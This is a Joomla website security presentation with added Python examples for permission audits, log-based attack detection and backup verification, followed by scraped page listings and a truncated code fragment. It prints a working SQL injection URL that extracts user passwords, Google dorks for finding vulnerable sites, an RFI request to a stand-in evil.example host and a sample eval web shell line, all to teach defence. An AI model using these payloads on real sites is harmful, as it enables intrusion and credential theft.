JOOMLA! SECURITY
By Shaiffulnizam Mohamad
“...Security is a moving target, so today’s expert might be tomorrow’s victim...”
Joomla! website hacked?
Definition of “Hacker”
• Someone who deliberately seeks to bypass a server’s security
  • Black, grey or white hat
  • A hacked site is a broken/compromised site
• A skilled computer programmer
  • A hacked site is a tweaked and improved site
• A script kiddie
  • Junior hacker using other hackers’ tools and techniques
Hacking Motives?
• To see if they can
• To create mayhem
• For social standing in the sub-culture
• For political reasons – hacktivism
• For financial reasons
  • Theft – steal ebooks, videos, games, online services etc.
  • Sell data – user profiles, credit card details etc.
  • Industrial sabotage – paid to break competitor sites
  • Set up zombie farms
  • Steal bandwidth
  • Host phishing pages
  • Collect passwords
How do we know that we’ve been hacked?
• Site trashed
• Hacking message (defacement)
• High bandwidth use
• Changed admin password
• New user with admin rights
• Server logs (the only one of these that also shows how they got in)
Why do we care about computer security?
No ONE is SAFE!

Type of site            Motivation
Any site                To see if they can; to create mayhem; social standing; post political messages; zombie farms; steal bandwidth; host phishing pages
Any membership site     Sell user profiles to marketers; obtain usernames and passwords
Some ecommerce sites    Sell credit card details to thieves; sell order history and contact details to marketers
Why worry about being hacked?
• Sites are targeted at random
• Hacking is actually quite easy
• Vulnerable sites are easy to find
• Vulnerable sites are easy to hack
• Fixing hacked sites is quite tricky
• Hacks can be invisible
• Clients may not notice a hacked site for some time
• Finding a clean backup may be impossible
• Determining what has been done can be really hard
• May be difficult to restore
• Hardening site to avoid future hacks requires skill and focus
Why worry about being hacked?
Hacked sites are a big problem
• Business reputation
• Angry clients
• Site shutdown by host
• Loss of business
• Data theft
Hacking Joomla! sites
Are Joomla! sites easy to hack?
• Yes and no
• Joomla has to strike a balance between security and ease of use
• Joomla is an attractive target for hackers
  • The critical mass of sites
  • Large amateur web developer user base
  • Extensions have variable security
• But the site must actually be vulnerable: a patched core with patched, well-chosen extensions is not an easy target
How do they hack?
1. Find a vulnerability (and instructions
on how to exploit it)
2. Find a vulnerable site
3. Hack the site
1st: Finding a vulnerability
• Security sites
  • www.exploit-db.com, www.secunia.com
• Various hacking sites/forums
• Joomla vulnerable extensions list
  • docs.joomla.org/Vulnerable_Extensions_List
2nd: Finding a vulnerable site
• Google dork: a search phrase that returns sites exposing a known-vulnerable feature
  • PHPInfo pages
    • intitle:phpinfo()
  • Vulnerable extensions (the component name appears in the URL)
    • allinurl:com_acajoom
3rd: cut and paste the code!
http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*
A UNION-based SQL injection in an unpatched Acajoom newsletter component: the injected SELECT appends username:password from the jos_users table to the page output, and the /**/ comments stand in for spaces to slip past naive filters.
Sometimes the foothold is RFI (remote file inclusion) instead:
a vulnerable extension includes a file from a URL supplied in a request parameter, so the attacker’s PHP web shell executes on the server and they take control of it.
What should we do to prevent it?
Joomla! security involves
• Server operating system
• Server software
• PHP + MySQL
• Joomla
• Extensions
• Users and their behaviour
What should we do to prevent it?
1. Updating Your Server Operating System
2. Update your Server Software e.g. Apache, Nginx,
IIS, Litespeed etc
3. Update Your PHP & MySQL Server
4. Secure Your Server
Security Action plan
[1] Basic actions
[2] More complex actions
[3] Actions that require significant modification rights
on the server (unless already implemented by
default)
Image by echiner1
What should we do to prevent it?
Joomla! Security
Server ~ shared, VPS and dedicated
• A shared server
  • Your site(s) live in the same hosting space as other sites that you do not administer
  • This is the cheapest hosting option
  • You have no say over the security of the other sites on the server, and if the host has not isolated accounts, a compromise of one of them can spread to yours
  • An old, poorly maintained shared server is the worst location for your hosting
• A Virtual Private Server
  • Better than shared
  • Depending on the provider, you still may not be able to change many settings
Joomla! Security
Server ~ shared, VPS and dedicated
• A dedicated server
  • Allows you to upgrade and tweak all the settings
  • The host retains responsibility for maintenance of the hardware and, on a managed plan, the operating system; confirm who patches what
Joomla! Security
Server ~ security
1. The underlying operating system must be kept updated
2. Update the web server, e.g. Apache, Nginx etc.
3. Update PHP and MySQL
4. Secure all of the above
5. Install additional security layers
Joomla! Security
Server ~ Security Hardening
1. Securing the Apache webserver
Adding response headers to mitigate XSS, clickjacking, MIME sniffing and protocol downgrade. The original slide wrote each header name with a trailing colon; mod_headers tolerates that, but the canonical form is Header set Name "value":
<IfModule mod_headers.c>
# Legacy browser XSS filter; modern browsers ignore it, the CSP below is the real control
Header set X-XSS-Protection "1; mode=block"
# X-Content-Security-Policy is the obsolete prefixed form; current browsers read Content-Security-Policy (value truncated on the original slide)
Header set X-Content-Security-Policy "allow 'self'; options inline-script; img$
# HSTS: 43200 s is only 12 hours; once HTTPS is confirmed working site-wide, raise max-age to at least 31536000 (one year)
Header set Strict-Transport-Security "max-age=43200; includeSubDomains"
# Caching, not a security header
Header set Cache-Control "max-age=3600, public, must-revalidate"
# Forbid framing (clickjacking) and content-type sniffing
Header set X-Frame-Options "deny"
Header set X-Content-Type-Options "nosniff"
#Header set X-Content-Security-Policy "default-src 'self'"
# Drop fingerprinting headers (pair with expose_php = Off in php.ini)
Header unset X-Powered-By
Header unset X-Pingback
</IfModule>
2. Hide the server signature (the ServerTokens and ServerSignature directives), so the Apache version is not advertised in responses and error pages
Joomla! Security
Server ~ Security Hardening
3. Activating .htaccess override in the Apache conf (AllowOverride)
• .htaccess files
  • [1] Activate the .htaccess file in the Joomla root (Joomla ships it as htaccess.txt; rename it to .htaccess)
  • [1] Use an .htpasswd for the /administrator/ folder (a second password prompt before the Joomla login, so automated login attacks never reach it)
  • [3] Advanced .htaccess files
Joomla! Security
Server ~ Security Hardening (PHP)
1. Hardening PHP with Suhosin (PHP 5 only; the extension was never completed for PHP 7 and later, so on current PHP rely on the settings below instead)
2. Use disable_functions in php.ini to remove the functions web shells depend on:
disable_functions = show_source,system,shell_exec,passthru,exec,phpinfo,popen,proc_open
3. Do not expose the PHP version: expose_php = Off
4. Use open_basedir to restrict the file-handling functions to the site’s own directory tree, so an include or file-read bug cannot reach /etc or another customer’s site
Joomla! Security
Server ~ Security Hardening (ownership and permissions)
• Globally reset all files and folders under the site root
• Owner – AccountUsername:AccountUsername (use . rather than *, so dot-files such as .htaccess are included)
chown -R user:group .
• Files – 644
find . -type f -exec chmod 644 {} \;
• Folders – 755
find . -type d -exec chmod 755 {} \;
Use suPHP (or, on current stacks, a PHP-FPM pool per site running as that site’s user)
PHP files then run as the site owner instead of the shared Apache user, so one compromised site cannot read or write its neighbours’ files. suPHP itself is no longer maintained.
Joomla! Security
Server ~ Security Hardening (MySQL)
1. Harden the MySQL server; give Joomla its own database user with rights only on its own database
2. Disable access from outside: bind-address = 127.0.0.1 in my.cnf (allow local connections only) and keep port 3306 closed on the firewall
3. Make sure every account has a password; after setup, run the mysql_secure_installation command (removes anonymous users and the test database, disables remote root login)
Joomla! Security
Server ~ additional security hardening
1. Add a host firewall, e.g. CSF (ConfigServer Security & Firewall)
2. Add the ModSecurity web application firewall: an Apache module that helps protect your website from various attacks. It blocks commonly known exploits using regular expressions and rule sets (e.g. the OWASP Core Rule Set); tune it on a staging copy first, since it will also block some legitimate administrator actions until the rules are adjusted
3. Install a malware detector such as maldet (Linux Malware Detect)
4. Install a rootkit detector (rkhunter, chkrootkit)
5. Install fail2ban and/or an IDS (intrusion detection system)
Joomla! Security
Use a CDN for security
1. Absorb DDoS traffic at the edge
2. Filter known attack patterns (a CDN-side WAF) before they reach the origin
3. Hide the origin server’s address
This only helps if the origin cannot be reached directly: restrict the web server to the CDN’s address ranges, otherwise attackers simply bypass the CDN. A CDN does not make a vulnerable extension any less vulnerable.
Joomla! Security Checklist (https://docs.joomla.org/Security)
Upgrade to the latest stable version of Joomla! as soon as possible.
Download Joomla! from official sites only, such as JoomlaCode.org (since retired; releases are now published on downloads.joomla.org), and check the hash of the package before installing it. MD5 only catches accidental corruption; prefer the SHA-2 checksums the download site publishes alongside it.
Use web page diagnostic tools, i.e. Firefox Firebug, IE Web Developer Toolbar, Opera Dragonfly, etc. to ensure that all files were installed correctly.
Joomla! Security Checklist (https://docs.joomla.org/Security)
Install official versions of Joomla!
http://www.joomla.org/download.html
Install official updates from Joomla!
To avoid breaking your site, search the forums for reports of incompatible extensions before upgrading to a new version of Joomla.
Joomla! Security Checklist (https://docs.joomla.org/Security)
Default administrator username
Change the user name of the default admin user. Attackers must know both the username and the password; with “admin” left in place only the password stands between them and the Super User account, and brute-force tools try that username first.
Administrator passwords
Never use easy-to-guess passwords such as admin123, password or 123456.
Use a long passphrase, or a randomly generated password mixing upper- and lower-case letters, digits and special characters (e.g. F1$hn3Tw0Rk), at least 12 characters long and unique to this site; a password manager makes this practical. Length matters more than substitutions such as 1 for i.
Joomla! Security Checklist (https://docs.joomla.org/Security)
Limit Super Users
Fewer Super User accounts means fewer credentials to steal and fewer people who can install code on the server.
Disable user registration unless you are running a social site or the site is limited to your own employees; every self-registered account is a foothold for spam and for probing authenticated functionality.
Joomla! Security Checklist (https://docs.joomla.org/Security)
Protecting directories and files
Only the paths Joomla needs to write to (tmp, logs, cache, and the images/ and extension directories used for uploads and installs) should be writable by the web server user.
Never use chmod 777; chmod 755 is sufficient for directories and 644 for files. Use .htaccess to stop directories such as images and downloads from running PHP files:
# secure directory by disabling script execution
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI
This works only where the Apache configuration allows .htaccess overrides (AllowOverride) for that directory, and it must be re-checked after hosting changes such as a move to PHP-FPM; on Apache 2.4 a FilesMatch block with Require all denied for *.php in the upload directories is the more direct way to express the same rule.
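The two rules above (no 777, no PHP where uploads live) are easy to state and easy to drift from. The script below, added here as an example (it is not from the slides and not a Joomla tool), audits a site tree for exactly those problems and then applies the same 644/755 reset the find/chmod commands earlier on the page perform. The sample tree it builds in a temporary directory is constructed, with three deliberate mistakes; the point of the second audit is that resetting modes does not remove a web shell that was uploaded with a perfectly normal mode.

```python
"""Audit a Joomla tree for the permission problems the checklist warns about
and apply the slide's 644/755 reset. Added example, not from the slides;
the sample site tree below is constructed."""
import os
import stat
import tempfile

UPLOAD_DIRS = ('images', 'media', 'tmp', 'cache', 'logs')   # should never execute PHP
PHP_EXT = ('.php', '.phtml', '.php5', '.php7', '.phar')


def audit(root):
    """Return sorted (relative path, issue) pairs; an empty list means clean."""
    issues = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if rel_dir != '.':
            dmode = stat.S_IMODE(os.stat(dirpath).st_mode)
            if dmode != 0o755:
                issues.append((rel_dir, f'dir mode {dmode:o}, want 755'))
        top = rel_dir.split(os.sep)[0]
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            fmode = stat.S_IMODE(os.lstat(path).st_mode)
            if fmode & 0o002:                       # anyone on the box can rewrite it
                issues.append((rel, f'world-writable ({fmode:o})'))
            elif fmode != 0o644 and not (name == 'configuration.php' and fmode == 0o444):
                issues.append((rel, f'file mode {fmode:o}, want 644'))
            if top in UPLOAD_DIRS and name.lower().endswith(PHP_EXT):
                issues.append((rel, 'PHP file in upload directory'))
    return sorted(issues)


def reset_modes(root):
    """Programmatic equivalent of the slide's find/chmod reset: 755 for
    directories, 644 for files, 444 for configuration.php. Returns the number
    of paths changed. It only fixes modes; the web shell audit() reports stays."""
    changed = 0
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            if stat.S_IMODE(os.stat(p).st_mode) != 0o755:
                os.chmod(p, 0o755)
                changed += 1
        for f in filenames:
            p = os.path.join(dirpath, f)
            want = 0o444 if f == 'configuration.php' else 0o644
            if stat.S_IMODE(os.lstat(p).st_mode) != want:
                os.chmod(p, want)
                changed += 1
    return changed


def make_sample_site(base):
    """Constructed Joomla-like tree with three deliberate mistakes."""
    layout = {
        'index.php': 0o644,
        'configuration.php': 0o444,
        '.htaccess': 0o644,
        'administrator/index.php': 0o644,
        'images/logo.png': 0o644,
        'images/stories/shell.php': 0o644,   # uploaded web shell: right mode, wrong place
        'tmp/upload.tmp': 0o666,             # world-writable file
    }
    for rel, mode in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as fh:
            fh.write(b'<?php // constructed sample\n' if rel.endswith('.php') else b'x')
        os.chmod(path, mode)
    for d in ('administrator', 'images', 'images/stories'):
        os.chmod(os.path.join(base, d), 0o755)   # explicit, independent of umask
    os.chmod(os.path.join(base, 'tmp'), 0o777)   # the classic "chmod 777 tmp" mistake
    return base


def demo():
    """Audit the constructed tree, apply the reset, audit again."""
    with tempfile.TemporaryDirectory() as base:
        make_sample_site(base)
        before = audit(base)
        changed = reset_modes(base)
        after = audit(base)
    return before, changed, after


if __name__ == '__main__':
    for label, result in zip(('before', 'changed', 'after'), demo()):
        print(label, result)
```

Run it against a real document root by calling audit('/path/to/htdocs') and reading the list before calling reset_modes; the one finding the reset cannot clear, PHP under images/, is the one that needs the .htaccess rule above and a manual clean-up.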
Joomla! Security Checklist (https://docs.joomla.org/Security)
Remove all unneeded files and extensions
All unneeded and unused files and extensions must be removed. Disabling an extension leaves its files on disk, where a poorly written one can still be requested directly.
In general, do not leave any unneeded files (compressed or otherwise) on a public server.
Each unused (and perhaps long forgotten) file is a potential security hole.
Joomla! Security Checklist (https://docs.joomla.org/Security)
Installing Joomla! extensions
1. Always back up first
2. Check the Vulnerable Extensions List for the extension and version
3. Download from trusted sites (the Joomla! Extensions Directory or the developer’s own site), never from “nulled” or re-packaged copies
4. Check the code quality of the extension
5. Test on a development site
6. Remove junk (leftover sample files, installer packages)
7. Avoid encrypted (obfuscated) code: you cannot review it for vulnerabilities or backdoors
Joomla! Security: How to secure Joomla!
[1] SEF all URLs
[2] Clear the default Joomla metatags
[3] Clear the default home page title
[4] Remove the generator tag
[5] Change the favicon
[6] Hide component credits
The less information the site reveals about Joomla! and its extensions, the less likely it is to be picked up by the version- and component-specific searches (Google dorks, fingerprinting tools) shown earlier. This only hides the target; it does not fix a vulnerable extension, so it complements updating rather than replacing it.
Joomla! Security: How to secure Joomla!
Implement two-factor authentication
Two-factor authentication is a login method whereby a person has to provide a user name, a password and a randomly generated OTP (one-time password).
The OTP is a six-digit numeric code generated by a cryptographic function (an HMAC over a shared secret and the current 30-second time step, RFC 6238 TOTP, which is what Google Authenticator implements). Even if an attacker guesses or steals the Joomla administrator username and password, they still need the OTP to log in, and a stolen code is only valid for one time step.
Enabling two-factor authentication requires Joomla 3.2.0 or higher.
1. Log in to the Administration area.
2. Click on Components >> Post-installation Messages.
3. Click on Enable two-factor authentication.
4. Install a Google Authenticator-compatible client on your device and scan the QR code shown in your user profile.
Joomla! Security: How to secure Joomla!
Spam bots try to inject spam content onto your site. They target Joomla core forms (registration, contact) and extension forms.
Use a CAPTCHA (Joomla ships a reCAPTCHA plugin) to fight automated spammers; it stops bulk automation, not a human attacker.
Joomla! Security: How to secure Joomla!
Use security extensions
Joomla! Security: How to secure Joomla!
Disable the FTP layer in Joomla!’s Global Configuration
• If an attacker obtains your FTP password, they can log in as you, bypassing almost every other security barrier.
• FTP passwords are stored unencrypted in your FTP program, often in a standard file at a standard location that credential-stealing malware knows to harvest.
• FTP authentication details pass unencrypted over the network to the server, so anyone on the path can read them.
• Use SFTP or FTPS for your own uploads, and if the FTP layer is not needed for file writes, leave it off so the credentials are never stored in configuration.php.
Joomla! Security: How to secure Joomla!
Change the temporary folder and log path (Global Configuration) to locations outside the web root, so files written there cannot be requested directly.
Joomla! Security: How to secure Joomla!
Check regularly for Joomla! and extension updates (the Update component in the administrator area) and apply them promptly; most mass compromises exploit vulnerabilities for which a patch already exists.
Joomla! Security: How to secure Joomla!
Preparing for the worst
Are you ready?
Joomla! Security: How to secure Joomla!
Preparing for the worst
1. Site monitoring
2. Joomla site backups
3. Restoring a hacked site
Joomla! Security: Site monitoring
• Diagnostics
  • Site down
  • Home page content changes
  • mod_security logs (show attempts, not only successes)
  • Bandwidth use
  • Spam blacklisting
  • [3] Searching and browsing server logs
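The log search in [3] is where the SQL-injection and remote-file-inclusion requests from the “How do they hack?” slides show up, usually days before anyone notices a defacement. The script below is an added example (not from the slides, and not ModSecurity or any Joomla tool): it parses Apache combined-format access log lines and tags requests that look like the payload shown earlier, a remote URL passed as a parameter, a phpinfo() probe, or PHP being executed out of an upload directory. The log lines, IP addresses, evil.example and com_example are constructed for the example; the com_acajoom request mirrors the payload on the earlier slide.

```python
"""Flag common Joomla attack patterns in Apache combined-format access logs.
Added example, not from the slides or from ModSecurity. The log lines, the
IP addresses, evil.example and com_example are constructed for the example."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SQLI_RE = re.compile(r'\bunion\b.*\bselect\b|\bconcat\(|\bfrom\s+\w*_users\b|0x3a')
UPLOAD_DIR_PHP_RE = re.compile(r'^/(images|media|tmp|cache|logs)/.*\.ph(p\d?|tml)$', re.I)
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.I)


def normalise(raw):
    """Undo the obfuscation used in the slide's payload: URL encoding (twice,
    for double-encoded requests), /**/ comments standing in for spaces, case."""
    s = unquote_plus(unquote_plus(raw))
    s = re.sub(r'/\*.*?\*/', ' ', s)
    return re.sub(r'\s+', ' ', s).lower()


def classify(target, status):
    """Return the attack tags that apply to one request target."""
    parts = urlsplit(target)
    path, query = parts.path, parts.query
    tags = []
    if SQLI_RE.search(normalise(query)):
        tags.append('sqli')
    # RFI: a parameter whose value is a remote URL, e.g. controller=http://host/shell.txt
    if any(REMOTE_URL_RE.match(v)
           for _, v in parse_qsl(unquote_plus(query), keep_blank_values=True)):
        tags.append('rfi')
    if 'phpinfo' in path.lower():
        tags.append('phpinfo-probe')
    if UPLOAD_DIR_PHP_RE.match(path):
        # PHP executed from a directory that should only hold uploads; a 200
        # means the "Options -ExecCGI" control from the checklist is missing
        tags.append('php-in-upload-dir' + ('!' if status == '200' else ''))
    return tags


def scan(lines):
    """Map each source IP to the sorted set of attack tags it triggered."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue   # not combined format: skip rather than crash on a malformed line
        tags = classify(m['target'], m['status'])
        if tags:
            hits[m['ip']].update(tags)
    return {ip: sorted(t) for ip, t in hits.items()}


# Constructed sample log: one normal visitor, one attacker working through the
# slide's sequence (SQLi, then RFI, then calling the dropped shell), one scanner.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2015:14:02:11 +0800] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2015:14:02:40 +0800] "GET /index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/* HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2015:14:03:02 +0800] "GET /index.php?option=com_example&controller=http://evil.example/shell.txt? HTTP/1.1" 200 51 "-" "libwww-perl/6.05"',
    '198.51.100.9 - - [10/Mar/2015:14:03:30 +0800] "GET /images/stories/story.php?cmd=id HTTP/1.1" 200 92 "-" "libwww-perl/6.05"',
    '192.0.2.44 - - [10/Mar/2015:14:05:01 +0800] "GET /phpinfo.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, tags)
```

Feed it a real file with scan(open('/var/log/apache2/access.log')); the interesting output is not the scanner that got a 404, but any address whose tags end in “!”, because that is a request for PHP in an upload directory that the server answered with 200.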
Joomla! Security: Joomla! backup
• Why back up?
• When should I back up my Joomla! site?
• How often should I back up my Joomla! site?
• How to back up?
Joomla! Security: Joomla! backup
How to back up?
1. Manual backup through the command line (mysqldump for the database, a tar archive for the files)
2. Using extensions such as Akeeba Backup, EJB and XCloner
What to back up?
1. All files (including configuration.php and .htaccess)
2. Images or documents
3. The database
REMEMBER TO TEST YOUR BACKUP: restore it somewhere else and check it, and keep copies off the server, otherwise an attacker who gets in can delete the backups too.
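A backup that has never been restored is a hope, not a backup, and after a compromise the second question is which backup is still clean. The script below is an added example (not the slides’ procedure and not Akeeba or XCloner code): it archives a constructed site tree together with a constructed SQL dump, records a SHA-256 manifest, restores the archive into a fresh directory and checks every file against the manifest; it then plants a web shell, takes a second backup and checks that one against the first manifest, which is how you tell a pre-compromise backup from one taken afterwards. All file contents and paths are constructed.

```python
"""Back up a site tree plus a database dump, then prove the backup restores
and that a later backup differs from the known-good one. Added example, not
the slides' procedure and not Akeeba/XCloner code; all files are constructed."""
import hashlib
import io
import os
import tarfile
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def manifest_of(root):
    """Relative path -> SHA-256 for every regular file under root."""
    out = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            out[os.path.relpath(p, root).replace(os.sep, '/')] = sha256_file(p)
    return out


def make_backup(site_root, db_dump, archive_path):
    """Write the site files (as htdocs/) and the SQL dump (db.sql) into one
    .tar.gz and return the manifest the restore test is checked against.
    Keep the manifest somewhere the web server user cannot overwrite."""
    with tarfile.open(archive_path, 'w:gz') as tar:
        tar.add(site_root, arcname='htdocs')
        info = tarfile.TarInfo('db.sql')
        info.size = len(db_dump)
        tar.addfile(info, io.BytesIO(db_dump))
    manifest = {'htdocs/' + k: v for k, v in manifest_of(site_root).items()}
    manifest['db.sql'] = hashlib.sha256(db_dump).hexdigest()
    return manifest


def restore_and_verify(archive_path, manifest, dest):
    """Extract into dest, refusing path-traversal members, and return the
    sorted list of problems; an empty list means the backup is restorable
    and identical to what the manifest describes."""
    problems = []
    with tarfile.open(archive_path, 'r:gz') as tar:
        for m in tar.getmembers():
            if m.name.startswith('/') or '..' in m.name.split('/'):
                problems.append(f'unsafe member {m.name}')
        if problems:
            return problems
        # the 'data' filter (Python 3.12+, backported to 3.8.17+) rejects unsafe members too
        kwargs = {'filter': 'data'} if hasattr(tarfile, 'data_filter') else {}
        tar.extractall(dest, **kwargs)
    restored = manifest_of(dest)
    for rel, digest in manifest.items():
        if rel not in restored:
            problems.append(f'missing {rel}')
        elif restored[rel] != digest:
            problems.append(f'corrupt {rel}')
    problems += [f'unexpected {rel}' for rel in restored if rel not in manifest]
    return sorted(problems)


def demo():
    """Back up a constructed site, restore and verify it; then plant a web
    shell, take a second backup and check it against the first manifest."""
    with tempfile.TemporaryDirectory() as work:
        site = os.path.join(work, 'site')
        files = {'index.php': b'<?php // constructed\n',
                 'configuration.php': b'<?php // constructed config\n',
                 'images/logo.png': b'\x89PNG constructed'}
        for rel, body in files.items():
            os.makedirs(os.path.dirname(os.path.join(site, rel)), exist_ok=True)
            with open(os.path.join(site, rel), 'wb') as fh:
                fh.write(body)
        dump = b'-- constructed mysqldump output\nCREATE TABLE jos_users (id INT);\n'
        first = os.path.join(work, 'backup1.tar.gz')
        good = make_backup(site, dump, first)
        clean = restore_and_verify(first, good, os.path.join(work, 'restore1'))
        # compromise after the first backup: code appended to index.php
        with open(os.path.join(site, 'index.php'), 'ab') as fh:
            fh.write(b'<?php eval($_POST["c"]); // constructed web shell\n')
        second = os.path.join(work, 'backup2.tar.gz')
        make_backup(site, dump, second)
        later = restore_and_verify(second, good, os.path.join(work, 'restore2'))
    return len(good), clean, later


if __name__ == '__main__':
    print(demo())
```

The manifest is the part most backup routines skip: without a hash list taken when the site was known to be clean, every backup looks equally good, and the “finding a clean backup may be impossible” problem from the earlier slide is exactly what results.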
Restoring a hacked site from a backup
• Fixes the obvious problems
• Does not address:
  • Hidden hacks
  • Shell scripts
  • Backdoors
  • Zombies
  • Continuing vulnerabilities (the restored copy has the same hole that was exploited)
  • Impacts of data exposure
Photo: flickr.com/photos/andreweason
Joomla! Security
The End
Shaiffulnizam Mohamad
OWASP Members since 2010
Involved in all Joomla Day Malaysia since
2007
Specializing in Joomla! And Security.
shaifful.md@gmail.com / 0129531452
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 

Joomla! Security Checklist for Websites

9. Why worry about being hacked?
Hacked sites are a big problem
• Business reputation
• Angry clients
• Site shutdown by host
• Loss of business
• Data theft
11. Are Joomla! sites easy to hack?
• Yes and no
• Joomla has to strike a balance between security and ease of use
• Joomla is an attractive target for hackers
  • The critical mass of sites
  • Large amateur web developer user base
  • Extensions have variable security
• The site must be vulnerable

12. How do they hack?
1. Find a vulnerability (and instructions on how to exploit it)
2. Find a vulnerable site
3. Hack the site
13. 1st: Finding a vulnerability
• Security sites
  • www.exploit-db.com, www.secunia.com
• Various hacking sites/forums
• Joomla vulnerable extensions list
  • docs.joomla.org/Vulnerable_Extensions_List

14. 2nd: Find a vulnerable site
• Google Dork - a search phrase to find vulnerable sites
• PHPInfo
  • intitle:phpinfo()
• Vulnerable extensions
  • allinurl:com_acajoom
15. 3rd: Cut and paste the code!
http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*

16. Sometimes…
RFI = Remote File Inclusion
Executing SHELL files and taking control of the server
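A defender-side companion to slides 14-16, added here and not part of the original deck: a scanner over constructed Apache access-log lines that flags the traces these attacks leave, a UNION/SELECT injection padded with /**/ comments in a component query string (the com_acajoom request above), a remote file inclusion attempt (a parameter whose value is a URL), and requests for phpinfo pages. The log lines, hosts and the com_example component are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (hosts, paths and agents are made up);
# the second line carries the com_acajoom UNION SELECT request from slide 15.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2015:10:01:02 +0800] "GET /index.php?option=com_content&view=article&id=4 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/May/2015:10:01:07 +0800] "GET /index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [10/May/2015:10:01:09 +0800] "GET /index.php?option=com_example&controller=http://evil.example/shell.txt? HTTP/1.1" 200 300 "-" "libwww-perl/6.05"
198.51.100.7 - - [10/May/2015:10:02:11 +0800] "GET /phpinfo.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# (rule name, regex) applied to the URL-decoded, lower-cased request path.
# The SQLi rule accepts whitespace or /**/ comment padding between the keywords.
RULES = [
    ("sqli_union_select", re.compile(r"union(/\*.*?\*/|\s)+select")),
    ("rfi_url_in_param",  re.compile(r"[?&][^=&]+=(https?|ftp)://")),
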